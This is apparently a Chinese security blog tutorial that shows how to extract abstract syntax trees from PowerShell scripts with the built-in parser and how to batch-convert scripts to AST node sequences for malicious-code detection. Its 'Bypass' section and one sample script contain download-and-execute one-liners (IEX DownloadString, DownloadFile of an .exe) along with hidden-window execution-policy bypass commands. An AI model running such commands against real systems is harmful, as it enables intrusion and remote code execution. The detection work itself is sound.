Eastmount
Eastmount

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解

简单纪念下,CSDN阅读量即将破千万,全网粉丝近30万。十年啊,近700篇文章,确实可以说一句:这就是我20到30岁的青春,这里既有技术博客,也有娜璋珞一家的故事,我们的爱情史,也见证了一个自幼受贵州大山熏陶的学子慢慢成长,让我认识了许许多多的博友。如图7的苏老师,受尽挫折,博士毕业,回到家乡玉林成为了一名大学老师,今天更是自费建成了化学实验室,只想将自己的所学所感传递给他的学生。十年,我在CSDN认识了许多这样的博友、老师和大佬,我们从未谋面,我们天南地北,但相互鼓励,苔花如米小,也学牡丹开。

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第1张图片

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第2张图片


最后,感谢CSDN,这些年让我骗了很多礼物,更感谢每一位阅读过娜璋故事,每一位给我技术博客点赞的读者。也希望大家记住一个叫Eastmount的分享者,对,不是什么专家,也不是什么大佬,就是一个默默撰写博客的技术分享者,因为爱所以写(今年太忙写得很少很少)。我还将在CSDN写二十年,三十年,一辈子,也将记录我们一家的故事。好想继续抒写我们的故事,但太忙太忙,毕业后再好好写吧。

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第3张图片

真的想早日毕业,回到家乡贵州继续当个教书匠,感觉好多要分享的博客,好多要上的课程,好多要开源的代码,好多要学习的知识,期待再次站在讲台前的那一天。随便参加个活动吧,我跟CSDN“生命不止,写作不熄”的故事看下面这篇文章吧!太忙太忙,这里就简单聊几句,等下一个十年,我们再详细回顾这20年的故事。继续沉下心去学习,虽菜但勤,感恩遇见,继续加油,晚安娜!

  • 我与CSDN的这十年——笔耕不辍,青春热血

    [系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第4张图片

您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列。因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全、逆向分析和恶意代码检测,“系统安全”系列文章会更加聚焦,更加系统,更加深入,也是作者的慢慢成长史。换专业确实挺难的,逆向分析也是块硬骨头,但我也试试,看看自己未来四年究竟能将它学到什么程度,漫漫长征路,偏向虎山行。享受过程,一起加油~

前文简单介绍了PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取,主要从论文的角度讲解。这篇文章将详细介绍抽象语法树的抽取方法,通过官方提供的接口实现,包括抽象语法树可视化和节点提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。

在这里插入图片描述

文章目录

  • 一.Powershell概述
    • 1.高威胁
    • 2.基础语法
    • 3.Bypass
  • 二.powershell.one
    • 1.概念
    • 2.访问AST
  • 三.抽象语法树可视化
    • 1.官方示例
    • 2.代码块的AST抽取
    • 3.指定PS文件的AST抽取
  • 四.抽象语法树节点提取
    • 1.提取AST节点
    • 2.AST节点拼接
    • 3.循环读取PS并提取AST
  • 五.ParseInput替换Create
  • 六.总结

希望这些基础原理能更好地帮助大家做好防御和保护,基础性文章,希望对您有所帮助。作者作为网络安全的小白,分享一些自学基础教程给大家,主要是在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔!

作者的github资源:

  • 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
  • 网络安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study

从2019年7月开始,我来到了一个陌生的专业——网络空间安全。初入安全领域,是非常痛苦和难受的,要学的东西太多、涉及面太广,但好在自己通过分享100篇“网络安全自学”系列文章,艰难前行着。感恩这一年相识、相知、相趣的安全大佬和朋友们,如果写得不好或不足之处,还请大家海涵!

接下来我将开启新的安全系列,叫“系统安全”,也是免费的100篇文章,作者将更加深入的去研究恶意样本分析、逆向分析、内网渗透、网络攻防实战等,也将通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步,加油~

  • 推荐前文:网络安全自学篇系列-100篇

前文分析:

  • [系统安全] 一.什么是逆向分析、逆向分析基础及经典扫雷游戏逆向
  • [系统安全] 二.如何学好逆向分析及吕布传游戏逆向案例
  • [系统安全] 三.IDA Pro反汇编工具初识及逆向工程解密实战
  • [系统安全] 四.OllyDbg动态分析工具基础用法及Crakeme逆向
  • [系统安全] 五.OllyDbg和Cheat Engine工具逆向分析植物大战僵尸游戏
  • [系统安全] 六.逆向分析之条件语句和循环语句源码还原及流程控制
  • [系统安全] 七.逆向分析之PE病毒原理、C++实现文件加解密及OllyDbg逆向
  • [系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及蓝屏攻击
  • [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度提权
  • [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)复现
  • [系统安全] 十一.那些年的熊猫烧香及PE病毒行为机理分析
  • [系统安全] 十二.熊猫烧香病毒IDA和OD逆向分析(上)病毒初始化
  • [系统安全] 十三.熊猫烧香病毒IDA和OD逆向分析(中)病毒释放机理
  • [系统安全] 十四.熊猫烧香病毒IDA和OD逆向分析–病毒释放过程(下)
  • [系统安全] 十五.Chrome浏览器保留密码功能渗透解析、蓝屏漏洞及某音乐软件漏洞复现
  • [系统安全] 十六.PE文件逆向基础知识(PE解析、PE编辑工具和PE修改)
  • [系统安全] 十七.Windows PE病毒概念、分类及感染方式详解
  • [系统安全] 十八.病毒攻防机理及WinRAR恶意劫持漏洞(脚本病毒、自启动、定时关机、蓝屏攻击)
  • [系统安全] 十九.宏病毒之入门基础、防御措施、自发邮件及宏样本分析
  • [系统安全] 二十.PE数字签名之(上)什么是数字签名及Signtool签名工具详解
  • [系统安全] 二十一.PE数字签名之(中)Signcode、PEView、010Editor、Asn1View工具用法
  • [系统安全] 二十二.PE数字签名之(下)微软证书漏洞CVE-2020-0601复现及Windows验证机制分析
  • [系统安全] 二十三.逆向分析之OllyDbg动态调试复习及TraceMe案例分析
  • [系统安全] 二十四.逆向分析之OllyDbg调试INT3断点、反调试、硬件断点与内存断点
  • [系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
  • [系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及病毒解析
  • [系统安全] 二十七.WannaCry勒索病毒分析 (3)蠕虫传播机制解析及IDA和OD逆向
  • [系统安全] 二十八.WannaCry勒索病毒分析 (4)全网"最"详细的蠕虫传播机制解读
  • [系统安全] 二十九.深信服分享之外部威胁防护和勒索病毒对抗
  • [系统安全] 三十.CS逆向分析 (1)你的游戏子弹用完了吗?Cheat Engine工具入门普及
  • [系统安全] 三十一.恶意代码检测(1)恶意代码攻击检测及恶意样本分析
  • [系统安全] 三十二.恶意代码检测(2)常用技术详解及总结
  • [系统安全] 三十三.恶意代码检测(3)基于机器学习的恶意代码检测技术
  • [系统安全] 三十四.恶意代码检测(4)编写代码自动提取IAT表、字符串及时间戳
  • [系统安全] 三十五.Procmon工具基本用法及文件进程、注册表查看
  • [系统安全] 三十六.学术分享之基于溯源图的攻击检测安全顶会论文总结
  • [系统安全] 三十七.Metasploit技术之基础用法万字详解及防御机理
  • [系统安全] 三十八.Metasploit后渗透技术信息收集、权限提权和功能模块详解
  • [系统安全] 三十九.Powershell恶意代码检测系列 (1)Powershell基础入门及管道和变量的用法
  • [系统安全] 四十.Powershell恶意代码检测系列 (2)Powershell基础语法和注册表操作
  • [系统安全] 四十一.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解
  • [系统安全] 四十二.Powershell恶意代码检测系列 (4)论文总结及抽象语法树(AST)提取
  • [系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解

声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。

一.Powershell概述

1.高威胁

近年来,Powershell 由于其易用性强、隐蔽性高的特点被广泛应用于 APT 攻击中,传统的基于人工特征提取和机器学习方法的恶意代码检测技术在 Powershell 恶意代码检测中越来越难以有效。

在这里插入图片描述

Microsoft 的 PowerShell 是一种命令行 shell 和脚本语言,默认安装在 Windows 机器上。它基于微软的.NET 框架,包括一个允许程序员访问操作系统服务的接口。虽然管理员可以配置 PowerShell 以限制访问和减少漏洞,但可以绕过这些限制。此外,PowerShell 命令可以轻松地动态生成、从内存中执行、编码和混淆,从而使 PowerShell 执行的代码的日志记录和取证分析具有挑战性。

由于这些原因,PowerShell 越来越多地被网络犯罪分子用作其攻击工具链的一部分,主要用于下载恶意内容和横向移动。事实上,赛门铁克最近一份关于 PowerShell 被网络犯罪分子滥用的综合技术报告报告称,他们收到的恶意 PowerShell 样本数量以及使用 PowerShell 的渗透工具和框架的数量急剧增加。这凸显了开发检测恶意 PowerShell 命令的有效方法的迫切需要。

2.基础语法

此外,在渗透测试中,Powershell是不能忽略的一个环节,而且仍在不断地更新和发展,它具有良好的灵活性和功能化管理Windows系统的能力。一旦攻击者可以在一台计算机上运行代码,就会下载PowerShell脚本文件(.ps1)到磁盘中执行,甚至无须写到磁盘中执行,它就可以直接在内存中运行。

这些特点使得PowerShell在获得和保持对系统的访问权限时,成为攻击者首选的攻击手段,利用PowerShell的诸多特点,攻击者可以持续攻击而不被轻易发现。常用的PowerShell攻击工具有以下几种。

  • PowerSploit
    这是众多PowerShell攻击工具中被广泛使用的PowerShell后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。
  • Nishang
    基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包含下载和执行、键盘记录、DNS、延时命令等脚本。
  • Empire
    基于PowerShell的远程控制木马,可以从凭证数据库中导出和跟踪凭据信息,常用于提供前期漏洞利用的集成模块、信息探测、凭据窃取、持久化控制。
  • PowerCat
    PowerShell版的NetCat,有着网络工具中的“瑞士军刀”美誉,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,读者可以在脚本中以多种方式使用它。

在PowerShell下,类似“cmd命令”叫作“cmdlet”,其命名规范相当一致,都采用“动词-名词”的形式,如New-Item,动词部分一般为Add、New、Get、Remove、Set等,命名的别名一般兼容Windows Command和Linux Shell,如Get-ChildItem命令使用dir或ls均可,而且PowerShell命令不区分大小写。

下面以文件操作为例讲解PowerShell命令的基本用法。

  • 新建目录:New-Item whitecellclub-ItemType Directory
  • 新建文件:New-Item light.txt-ItemType File
  • 删除目录:Remove-Item whitecellclub
  • 显示文件内容:Get-Content test.txt
  • 设置文件内容:Set-Content test.txt-Value “hello,world!”
  • 追加内容:Add-Content light.txt-Value “i love you”
  • 清除内容:Clear-Content test.txt

举个简单的示例:

New-Item test -ItemType directory
Remove-Item test
New-Item eastmount.txt -ItemType file -value "hello csdn"  

Get-Content eastmount.txt
Add-Content eastmount.txt -Value " bye!"
Get-Content eastmount.txt 

Set-Content eastmount.txt -Value "haha"
Get-Content eastmount.txt
Clear-Content eastmount.txt
Get-Content eastmount.txt
Remove-Item eastmount.txt
Get-Content eastmount.txt

在这里插入图片描述

3.Bypass

经过测试,在cmd窗口执行过程下载的PowerShell脚本,不论当前策略,都可以直接运行。而如果要在PowerShell窗口运行脚本程序,必须要管理员权限将Restricted策略改成Unrestricted,所以在渗透时,就需要采用一些方法绕过策略来执行脚本。

(1) 下载远程PowerShell脚本绕过权限执行
调用DownloadString函数下载远程的ps1脚本文件。

//cmd窗口执行以下命令
powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

//在powershell窗口执行
IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

下图引用谢公子的图片,切换到CMD窗口运行。

在这里插入图片描述

(2) 绕过本地权限执行
上传xxx.ps1至目标服务器,在CMD环境下,在目标服务器本地执行该脚本,如下所示。

PowerShell.exe -ExcutionPolicy Bypass -File xxx.ps1

powershell -exec bypass  .\test.ps1

在这里插入图片描述

(3) 本地隐藏绕过权限执行脚本

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo
-NonInteractive -NoProfile -File xxx.ps1

举个示例:

  • powershell.exe -exec bypass -W hidden -nop test.ps1

(4) 用IEX下载远程PS1脚本绕过权限执行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden-NoProfile
-NonIIEX(New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]

函数定义:

function Test-MrParameter {

    param (
        [string]$ComputerName
    )

    Write-Output $ComputerName
	Write-Output ($ComputerName+$ComputerName)
	Write-Output ($ComputerName+$ComputerName+$ComputerName)
}

查看和使用函数:

Get-Command -Name Test-MrParameter -Syntax
Test-MrParameter -ComputerName 'this is a computer name'
pause

输出结果:

Test-MrParameter [[-ComputerName] <Object>]

this is a computer name
按 Enter 键继续...:

二.powershell.one

PowerShell 的抽象语法树作为代码的语义表达,以多叉树的形式表示脚本功能的逻辑结构,保留了代码上下文的特征并剔除无关的参数干扰,是分析功能类似的PowerShell代码的有效方法 。常见方法是使用接口或编写自定义程序实现。前文介绍了第一种方法,这篇文章将介绍官方提供的接口。

  • Deobshell
    https://github.com/thewhiteninja/deobshell
  • powershell.one => Convert-CodeToAst
    https://powershell.one/powershell-internals/parsing-and-tokenization/abstract-syntax-tree#ast-object-inheritance

Windows 为PowerShell提供了访问脚本AST的接口,使用内置接口获取的 AST 结构如图所示。

在这里插入图片描述

The Abstract Syntax Tree (AST) groups tokens into meaningful structures and is the most sophisticated way of analyzing PowerShell code.

1.概念

PowerShell解析器将单个字符转换为有意义的关键字并区分例如命令、参数和变量,这称为标记化,之前已介绍过。例如,编辑器使用这些标记为代码着色并以与命令不同的颜色显示变量。

解析器并不止于此。为了让PowerShell执行代码,它需要知道各个令牌如何形成可以执行的结构。解析器获取标记并构建一个抽象语法树(AST),它基本上将标记分组为有意义的结构。

抽象语法树之所以称为树,是因为它的工作方式类似于分层树。PowerShell从第一个标记开始,然后采用PowerShell语言定义(语法)来查看下一个可能的标记可能是什么。这样,解析器就可以通过代码工作。

  • 情况1:PowerShell成功并创建代码的有效结构
  • 情况2:遇到并引发语法错误

在这里插入图片描述

2.访问AST

从PowerShell 3 开始,抽象语法树向您公开,因此您现在也可以分析PowerShell代码并了解其内部结构。访问 AST 的主要方法有两种:

  • ScriptBlock(代码块):一个scriptblock是一个有效的PowerShell代码块,所以它已经被解析器处理过了,并且解析器保证代码中没有语法错误。每个scriptblock都有一个名为AST的属性,它公开了scriptblock中包含的代码的抽象语法树。
  • Parser(解析器):您可以要求PowerShell解析器解析任意代码并返回令牌和AST。当您输入和执行代码时,您基本上是在模仿PowerShell所做的事情。因为解析器处理原始文本,所以不能保证代码在语法上是正确的。这就是解析器还返回它发现的任何语法错误的原因。

查看AST的简单示例如下图所示,您可以查看解析器构建的抽象语法树(AST)。

$code.Invoke()
$code = { "Hello" * 10 }
$code.Ast

输出结果如下图所示:

在这里插入图片描述

这可以用来创建一个简单的测试函数来识别PowerShell代码

function Test-PowerShellCode
{
    param
    (
        [string]
        $Code
    )

    try
    {
        # try and convert string to scriptblock:
        $null = [ScriptBlock]::Create($Code)
    }
    catch
    {
        # the parser is invoked implicitly and returns
        # syntax errors as exceptions:
        $_.Exception.InnerException.Errors
    }
}

抽象语法树(AST) 是Ast对象的树。这棵树的顶部是解析器返回给您的内容。遍历抽象语法树时遇到的任何Ast对象都具有Parent和Extent属性。Parent定义树关系,Extent定义Ast对象涵盖的PowerShell代码。

常见方法如下:

Name                   Signature
----                   ---------
Copy                   System.Management.Automation.Language.Ast Copy()
Find                   System.Management.Automation.Language.Ast Find(System.Func[System.Management.Automation.Language.Ast,bool] predicate, bool searchNestedScriptBlocks)
FindAll                System.Collections.Generic.IEnumerable[System.Management.Automation.Language.Ast] FindAll(System.Func[System.Management.Automation.Language.Ast,bool] predicate, b...
Visit                  System.Object Visit(System.Management.Automation.Language.ICustomAstVisitor astVisitor), void Visit(System.Management.Automation.Language.AstVisitor astVisitor)

三.抽象语法树可视化

1.官方示例

It may be helpful to add the Ast object relationships to the output, and visualize the tree, and how the objects are nested. That’s why I created Convert-CodeToAst that takes any simple (or complex) PowerShell code (scriptblock) and outputs the object hierarchy and involved types:

在这里插入图片描述

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]
    [ScriptBlock]
    $Code
  )


  # build a hashtable for parents
  $hierarchy = @{}

  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = $_.Parent.GetHashCode()
    if ($hierarchy.ContainsKey($id) -eq $false)
    {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
    
  }
  
  # visualize tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  {
    # use this as indent per level:
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output current ast object with appropriate
      # indentation:
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent
    
      # take id of current ast object
      $newid = $_.GetHashCode()
      # recursively look at its children (if any):
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # start visualization with ast root object:
  Visualize-Tree -id $code.Ast.GetHashCode()
}

Call it like this:

Convert-CodeToAst -Code {
  # place your test code here (make it as simple as you can):
  $a = 1
}

运行结果:

[NamedBlockAst]: $a = 1
--[AssignmentStatementAst]: $a = 1
----[VariableExpressionAst]: $a
----[CommandExpressionAst]: 1
------[ConstantExpressionAst]: 1

函数代码解析:

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第5张图片

如果提示禁止运行脚本,如下图所示:

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第6张图片

需要简单设置即可。

  • set-ExecutionPolicy RemoteSigned
    系统上禁止运行脚本

在这里插入图片描述

同时,建议大家在VS Code中编辑Powershell代码。

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第7张图片

2.代码块的AST抽取

下面给出抽象语法树抽取的代码,代码比较简单,大家可以直接学习。

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [ScriptBlock]
    $Code
  )

  # build a hashtable for parents
  $hierarchy = @{}

  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = $_.Parent.GetHashCode()
    if ($hierarchy.ContainsKey($id) -eq $false)
    {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
    
  }
  
  # visualize tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  {
    # use this as indent per level:
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output current ast object with appropriate
      # indentation:
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent
    
      # take id of current ast object
      $newid = $_.GetHashCode()
      # recursively look at its children (if any):
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # start visualization with ast root object:
  Visualize-Tree -id $code.Ast.GetHashCode()
}

Convert-CodeToAst -Code {$a=1}

运行结果如下图所示:

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第8张图片

3.指定PS文件的AST抽取

直接给出指定PS脚本文件的抽取代码。

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第9张图片

完整代码及详细注释如下所示:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps文件名称
  )

  # 构建hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # 提取ps文件中的内容 
  Write-Output ("file name: {0}" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # 创建Scipt代码块
  $code = [ScriptBlock]::Create($content)

  # 提取AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # 递归可视化树
  function Visualize-Tree($Id, $Indent = 0)
  {
    # 每级缩进
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # 输出AST对象
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent
    
      # 获取当前AST对象的id
      $newid = $_.GetHashCode()
      # 递归其子节点(if any)
      if ($hierarchy.ContainsKey($newid)) {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # 使用AST根对象开始可视化
  Visualize-Tree -id $code.Ast.GetHashCode()
  return $result
}

Convert-CodeToAst -str .\data\example-001.ps1

此时输出结果如下图所示:

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第10张图片

假设存在“example-002.ps2”文件。

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第11张图片

对应的AST如下:

PS D:\powershell> .\get_ast_002.ps1
file name: .\data\example-002.ps1
powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');
[NamedBlockAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
--[PipelineAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
----[CommandAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
------[StringConstantExpressionAst]: powershell
------[InvokeMemberExpressionAst]: (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
--------[ParenExpressionAst]: (new-object system.net.webclient)
----------[PipelineAst]: new-object system.net.webclient
------------[CommandAst]: new-object system.net.webclient
--------------[StringConstantExpressionAst]: new-object
--------------[StringConstantExpressionAst]: system.net.webclient
--------[StringConstantExpressionAst]: downloadfile
--------[StringConstantExpressionAst]: 'http://192.168.10.11/test.exe'
--------[StringConstantExpressionAst]: 'test.exe'

那么,如果我只想提取节点,怎么实现呢?

四.抽象语法树节点提取

1.提取AST节点

采用后序遍历提取AST节点,具体代码如下:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps文件名称
  )

  # 构建hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # 提取ps文件中的内容 
  Write-Output ("file name: {0}" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # 创建Scipt代码块
  $code = [ScriptBlock]::Create($str)

  # 提取AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # 递归可视化树
  function Visualize-Tree($Id)
  {
    # 每级缩进
    $hierarchy[$id] | ForEach-Object {
      # 获取当前AST对象的id
      $newid = $_.GetHashCode()

      # 递归其子节点(if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      $null = $result.Add($_.GetType().Name)
    }
  }

  # 使用AST根对象开始可视化
  Visualize-Tree -id 0
  return $result
}

Convert-CodeToAst -str .\data\example-002.ps1

“$a=1”示例的输出结果如下图所示:

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第12张图片

另一段Powershell代码的后序节点输出结果如下图所示:

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第13张图片

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');
StringConstantExpressionAst
StringConstantExpressionAst
StringConstantExpressionAst
CommandAst
PipelineAst
ParenExpressionAst
StringConstantExpressionAst
StringConstantExpressionAst
StringConstantExpressionAst
InvokeMemberExpressionAst
CommandAst
PipelineAst
NamedBlockAst

2.AST节点拼接

最后添加add_blanks函数将各节点内容拼接,并存储至本地CSV或TXT文件中。完整代码如下所示:

# 函数:拼接AST节点内容
  function add_blanks {
      param (
        [parameter(Mandatory=$true)]
        [System.Array]$arr
      )
      $strNode = ''
      foreach($elem in $arr) {
          if($strNode.Length -ne 0) { #不等于
              $elem = " " + $elem
          }
          $strNode = $strNode + $elem
      }
      return $strNode
  }

# 函数:提取Powershell代码的抽象语法树(AST)
function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps文件名称
  )

  # 构建hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # 提取ps文件中的内容 
  Write-Output ("file name: {0}" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # 创建Scipt代码块
  $code = [ScriptBlock]::Create($content)

  # 提取AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # 递归可视化树
  function Visualize-Tree($Id)
  {
    # 每级缩进
    $hierarchy[$id] | ForEach-Object {
      # 获取当前AST对象的id
      $newid = $_.GetHashCode()

      # 递归其子节点(if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      $null = $result.Add($_.GetType().Name)
    }
  }

  # 使用AST根对象开始可视化
  Visualize-Tree -id $code.Ast.GetHashCode()

  # result存储根节点内容
  $strNode = add_blanks -arr $result
  Write-Output ($strNode,"`n")
  return $result
}

Convert-CodeToAst -str .\data\example-002.ps1

输出结果如下图所示:

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第14张图片

此外,本文给出一个真实攻击案例,看看它是否能有效还原对应的AST和节点。

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第15张图片

生成结构如下图所示。

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第16张图片

3.循环读取PS并提取AST

假设存在data.csv文件,包含四条Powershell脚本。涉及正常和异常家族,接下里我们将它转换为AST节点信息,并存储至新的CSV中。

在这里插入图片描述

使用命令如下:

  • Import-CSV .\data\data.csv

[系统安全] 四十三.Powershell恶意代码检测系列 (5)抽象语法树自动提取万字详解_第17张图片

# 函数:批量读取文件
function Read_csv_powershell {
  param (
    [parameter(Mandatory=$true)]
    [System.String]$inputfile,
    [System.String]$outputfile
  )

  # 读取CSV文件
  $content = Import-CSV $inputfile
  $list = [System.Collections.ArrayList]@()
  foreach($line in $content) {
    $no = $line.("no")
    $code = $line.("decoded code")
    $name = $line.("family name")
    # Write-Output($no, $code, $name)

    # 转换抽象语法树AST
    try {
      $str = Convert-CodeToAst -str $code
      Write-Output($str)
    } catch [System.Exception] {
      'exception info:{0}' -f $_.Eception.Message
      continue
    }
    $list.add([PSCustomObject]@{
      no = $no
      code = $code
      name = $name
      ast = $str
    })
  }
  $list | ConvertTo-Csv -NoTypeInformation | out-file $outputfile -Encoding ascii -Force
  Write-Output($list)
}

# 函数:拼接AST节点内容
function add_blanks {
    param (
      [parameter(Mandatory=$true)]
      [System.Array]$arr
    )
    $strNode = ''
    foreach($elem in $arr) {
        if($strNode.Length -ne 0) { #不等于
            $elem = " " + $elem
        }
        $strNode = $strNode + $elem
    }
    return $strNode
}

# 函数:提取Powershell代码的抽象语法树(AST)
function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps代码
  )

  # 构建hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # 创建Scipt代码块
  $code = [ScriptBlock]::Create($str)

  # 提取AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # 递归可视化树
  function Visualize-Tree($Id)
  {
    # 每级缩进
    $hierarchy[$id] | ForEach-Object {
      # 获取当前AST对象的id
      $newid = $_.GetHashCode()

      # 递归其子节点(if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      $null = $result.Add($_.GetType().Name)
    }
  }

  # 使用AST根对象开始可视化
  Visualize-Tree -id $code.Ast.GetHashCode()
  # Write-Output ($result,"`n")

  # result存储根节点内容
  $strNode = add_blanks -arr $result
  return $strNode
}

# 读取单独PS文件
# Convert-CodeToAst -str .\data\example-002.ps1

# 注意input是系统自带变量
$inputCSV = '.\data\data.csv'
$outputCSV = '.\data\data_AST.csv'
Read_csv_powershell -inputfile $inputCSV -outputfile $outputCSV

